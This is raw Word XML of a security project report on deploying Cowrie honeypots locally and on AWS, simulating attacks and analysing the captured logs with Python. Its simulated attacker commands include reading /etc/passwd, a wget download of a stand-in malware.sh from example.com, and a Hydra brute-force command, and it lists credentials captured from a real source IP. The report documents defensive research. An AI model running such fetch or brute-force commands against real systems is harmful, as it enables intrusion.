    <w:p w14:paraId="3FDA8AE8" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00C7525D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captured log data was processed using a custom Python analysis script that extracts key threat intelligence indicators — attack frequency, commonly attempted usernames and passwords, executed commands, and successful compromise events — and generates visual summaries using Matplotlib.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FB495" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00C7525D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To validate that the categories of attack technique observed on the honeypot correspond to genuine, exploitable weaknesses in real software, the project additionally reproduces and exploits CVE-2021-44228 ("Log4Shell"), a critical remote code execution vulnerability in the widely used Apache Log4j logging library, against a deliberately vulnerable Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F8AD9" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00C7525D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Finally, all collected log data — from both the local and cloud honeypot deployments — was ingested into Splunk, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> industry-standard SIEM platform, to build centralized dashboards and support security analyst-style investigation of the captured events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE950D" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00C7525D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B944E3C" w14:textId="31AC1E1C" w:rsidR="00C7525D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C7525D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Local Honeypot Deployment Using Cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68119FA5" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00C7525D" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201DF20E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2.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA3CCF" w14:textId="79A23DC4" w:rsidR="00C7525D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first component of this project is a locally deployed honeypot using Cowrie, a widely used open-source honeypot that emulates an SSH and Telnet server. Cowrie presents itself as a genuine Linux system to any connecting client, accepts login attempts, and — once a session is established emulates a realistic shell environment, allowing attacker commands to be captured without any actual system being compromised. This component was deployed on a Kali Linux environment running under Windows Subsystem for Linux (WSL2), using Docker to containerize the honeypot service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A030BC" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00C7525D" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0461B3B1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2.2 Architecture and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C7525D" w:rsidRPr="00C7525D" w14:paraId="360AA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</w:tcPr>
          <w:p w14:paraId="33375229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000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="6C57C5F5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3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="7E524AC0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C7525D" w:rsidRPr="00C7525D" w14:paraId="6D17C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A64FB7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Attacker environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="744CFD4A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Kali Linux (via WSL2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="489DE99B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Provides Nmap, Hydra, Metasploit and other offensive security tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7525D" w:rsidRPr="00C7525D" w14:paraId="4FFD7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DBA4D2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Containerization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4ED93D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Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F0E7E7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Runs Cowrie as an isolated, lightweight container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7525D" w:rsidRPr="00C7525D" w14:paraId="73B63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6E9F5E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Honeypot software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E4C32C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Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A2049A5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Emulates an SSH/Telnet server and logs all attacker interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7525D" w:rsidRPr="00C7525D" w14:paraId="01893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650E57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Brute-force testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE3F1F4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Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56C5E904" w14:textId="77777777" w:rsidR="008C6073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Automates credential-guessing attacks against the honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1838FAC0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07A8D68E" w14:textId="537A5C6F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2.3 Deployment Code / Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733BB1DE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honeypot container was deployed using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF690C" w14:textId="5FD3FD94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docker run -p 2222:2222 -p 2223:2223 --name cowrie -d cowrie/cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B311E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This command downloads the official Cowrie image and starts it as a background container, exposing port 2222 (emulated SSH) and port 2223 (emulated Telnet) to the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C60451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ssh -p 2222 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32A097B4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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55E8AD08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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42E12C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cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C549F2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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://example.com/malware.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B2B781" w14:textId="77777777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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1233587E" w14:textId="6436D3F6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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B766CBC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4243627F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17EFFAA8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69B83399" w14:textId="2E268CB0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2.4 Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA05D68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To generate realistic, varied attack data, the honeypot was manually attacked using multiple simulated attacker profiles (root, admin, test, ubuntu), each executing a distinct set of reconnaissance and post-exploitation commands, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E95CE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In addition, an automated brute-force attack was performed using Hydra to simulate credential-guessing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 xml:space="preserve"> typical of real-world attackers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D63130A" w14:textId="41D9D474" w:rsidR="00C7525D" w:rsidRPr="005A0CD5" w:rsidRDefault="00C7525D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hydra -l root -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt -s 2222 ssh://127.0.0.1 -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4850D5F9" w14:textId="77777777" w:rsidR="00C7525D" w:rsidRPr="00C7525D" w:rsidRDefault="00C7525D">
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEA0AAB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2.5 Execution Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A82447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Deploy the Cowrie container using Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B848FD6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Simulate multiple attacker sessions with varied usernames and command sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678EC8A0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Execute an automated brute-force attack using Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB391B1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Extract structured JSON logs from the container for analysis (see Section 4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E91EE5" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00C7525D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453311A" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000" w:rsidP="00C7525D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Cloud Honeypot Deployment on AWS EC2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF51787" w14:textId="77777777" w:rsidR="00C7525D" w:rsidRDefault="00C7525D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268F7A3A" w14:textId="44F2AD74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3.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E653B" w14:textId="2FC32DE7" w:rsidR="00C7525D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To capture genuine, real-world attacker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 xml:space="preserve"> rather than only simulated activity, an identical Cowrie honeypot was deployed on a public-facing Amazon Web Services (AWS) EC2 instance. Unlike the local deployment, this honeypot's ports were opened to the entire internet (source 0.0.0.0/0), allowing it to be discovered and attacked independently by unknown, real-world threat actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8B6027" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E48E78A" w14:textId="51946E75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3.2 Deployment Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE78029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An Ubuntu Server EC2 instance (t</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.micro</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, AWS Free Tier eligible) was launched with a public IPv4 address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252C755F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instance's security group was configured to allow inbound traffic on all ports from 0.0.0.0/0, replicating the exposure of a genuine internet-facing service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD616AA" w14:textId="0AF1E511" w:rsidR="00FA7585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Docker was installed on the instance, and the same Cowrie container image used in the local deployment was launched:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E076265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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install docker.io -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C56B6D2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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> start docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0997E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docker run -p 2222:2222 -p 2223:2223 --name cowrie -d cowrie/cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED7DFF" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="70"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBF6BEC" w14:textId="12D79833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3.3 Real-World Attack Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C410E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Within approximately 24 hours of deployment, the honeypot recorded connection attempts from multiple independent, unsolicited internet sources. Over the full monitoring period, the following was observed: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7525D" w:rsidRPr="005A0CD5" w14:paraId="519ADB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9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="7A78ADE5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5160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="02B4151E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C7525D" w:rsidRPr="005A0CD5" w14:paraId="75E96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CD6CE1A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Total connection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17AD7EE2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20+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7525D" w:rsidRPr="005A0CD5" w14:paraId="33E5C2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68EFAE3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Unique source IP addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063B818D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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7525D" w:rsidRPr="005A0CD5" w14:paraId="13B1AA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06B7458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Successful unauthorized logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="055B1E9A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2 (independent real attackers) + 4 (controlled Hydra brute-force test)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C7525D" w:rsidRPr="005A0CD5" w14:paraId="770835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1D85F99" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00FA758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Example compromised credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D83F7C" w14:textId="3D3A3765" w:rsidR="005A0CD5" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="005A0CD5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0CD5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>root / K3sXpvE1rZ (source: 111.229.161.160); admin / admin, admin / 123, admin / 12345, admin / console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F9FA9A0" w14:textId="77777777" w:rsidR="005A0CD5" w:rsidRDefault="005A0CD5" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494775F0" w14:textId="77777777" w:rsidR="005A0CD5" w:rsidRDefault="005A0CD5" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BEA30B" w14:textId="77777777" w:rsidR="005A0CD5" w:rsidRDefault="005A0CD5" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110453A3" w14:textId="55845506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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Analysis of the SSH client signatures associated with these connections (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>russh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>libssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramiko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-based clients) confirmed that the observed activity originated from automated scanning and credential-stuffing tools rather than manual, human-operated attacks — consistent with the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 xml:space="preserve"> of internet-wide botnet scanning infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459B274D" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E09522E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3.4 Execution Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A290DD" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:t>Launch and expose a public EC2 instance running Cowrie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C6CB0" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:t>Passively monitor for genuine, unsolicited internet traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D028642" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:t>Periodically extract and review JSON logs directly from the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E58884" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:t>Combine rotated log files to build a complete, chronological attack history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2F137" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00C7525D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDCACD7" w14:textId="77777777" w:rsidR="008C6073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FA7585">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Threat Intelligence Analysis Using Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589D5D9" w14:textId="77777777" w:rsidR="005A0CD5" w:rsidRPr="00FA7585" w:rsidRDefault="005A0CD5" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDF701F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4.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD420E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To convert raw honeypot logs into actionable threat intelligence, a custom Python script was developed to parse Cowrie's structured JSON log output and automatically extract key statistics: total connection attempts, most frequently attempted usernames and passwords, executed commands, successful login events, and file download/upload activity. The script additionally generates visual summaries using the Matplotlib library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683C0965" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.2 Code Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624160A0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script performs the following operations, in order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124BA69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Reads the honeypot's JSON log file line by line and parses each entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79101147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Uses Python's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>collections.Counter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to tally event types, usernames, passwords, and commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873C767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Extracts and lists all successful login events, including source IP and timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB5B47B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Generates five visualizations: event type breakdown, top usernames, top passwords, top commands, and a timeline of connection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9821D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Core extract of the analysis script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211EDDDD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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38323C7B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from collections import Counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A470250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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>matplotlib.pyplot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
